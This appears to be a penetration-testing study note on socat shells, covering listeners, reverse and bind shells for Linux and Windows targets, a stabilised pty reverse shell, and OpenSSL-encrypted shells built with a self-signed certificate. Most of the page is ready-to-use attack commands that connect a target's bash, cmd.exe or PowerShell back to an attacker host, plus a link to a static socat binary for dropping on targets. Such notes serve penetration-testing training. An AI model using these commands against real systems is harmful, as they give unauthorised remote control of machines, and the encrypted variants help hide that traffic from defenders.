---
title: Socat Shells - Notes
date: 2022-07-01 00:00:00 +530
categories: [ Cyber Security Notes, Shells]
tags: [Notes, Pentesting, Shells, Red Team]     # TAG names should always be lowercase
---

## Reverse Shells

reverse shell listener:  

`socat TCP-L:<port> -`  
On Windows we would use this command to connect back:

`socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:powershell.exe,pipes`  

The "pipes" option is used to force powershell (or cmd.exe) to use Unix style standard input and output.  

Linux Target:

`socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"`  

## Bind Shells

On a Linux target we would use the following command:

`socat TCP-L:<PORT> EXEC:"bash -li"`  

On a Windows target we would use this command for our listener:

`socat TCP-L:<PORT> EXEC:powershell.exe,pipes`  

We use the "pipes" argument to interface between the Unix and Windows ways of handling input and output in a CLI environment.  

command on our attacking machine to connect to the waiting listener.

`socat TCP:<TARGET-IP>:<TARGET-PORT> -`

---

Now let's take a look at one of the more powerful uses for Socat: a fully stable Linux tty reverse shell. This will only work when the target is Linux, but is _significantly_ more stable. Here is the new listener syntax:  

``socat TCP-L:<port> FILE:`tty`,raw,echo=0``  

Let's break this command down into its two parts. As usual, we're connecting two points together. In this case those points are a listening port, and a file. Specifically, we are passing in the current TTY as a file and setting the echo to be zero. This is approximately equivalent to using the Ctrl + Z, `stty raw -echo; fg` trick with a netcat shell -- with the added bonus of being immediately stable and hooking into a full tty.

[precompiled socat binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true), which can then be executed as normal.

The special command is as follows:

`socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane`  

This is a handful, so let's break it down.

The first part is easy -- we're linking up with the listener running on our own machine. The second part of the command creates an interactive bash session with  `EXEC:"bash -li"`. We're also passing the arguments: pty, stderr, sigint, setsid and sane:

-   **pty**, allocates a pseudoterminal on the target -- part of the stabilisation process
-   **stderr**, makes sure that any error messages get shown in the shell (often a problem with non-interactive shells)  
    
-   **sigint**, passes any Ctrl + C commands through into the sub-process, allowing us to kill commands inside the shell
-   **setsid**, creates the process in a new session
-   **sane**, stabilises the terminal, attempting to "normalise" it.

That's a lot to take in, so let's see it in action.

-----------

## Encrypted Shells


We covered how to create basic shells in the previous task, so that syntax will not be covered again here. Suffice to say that any time `TCP` was used as part of a command, this should be replaced with `OPENSSL` when working with encrypted shells. We'll cover a few examples at the end of the task, but first let's talk about certificates.

We first need to generate a certificate in order to use encrypted shells. This is easiest to do on our attacking machine:

`openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt`  
  
This command creates a 2048 bit RSA key with matching cert file, self-signed, and valid for just under a year. When you run this command it will ask you to fill in information about the certificate. This can be left blank, or filled randomly.  

We then need to merge the two created files into a single `.pem` file:

`cat shell.key shell.crt > shell.pem`  

Now, when we set up our reverse shell listener, we use:

`socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -`  

This sets up an OPENSSL listener using our generated certificate. `verify=0` tells the connection to not bother trying to validate that our certificate has been properly signed by a recognised authority. Please note that the certificate _must_ be used on whichever device is listening.  

To connect back, we would use:

`socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash`  

##### The same technique would apply for a bind shell:

Target:

`socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes`  

Attacker:

`socat OPENSSL:<TARGET-IP>:<TARGET-PORT>,verify=0 -`  

Again, note that even for a Windows target, the certificate must be used with the listener, so copying the PEM file across for a bind shell is required.
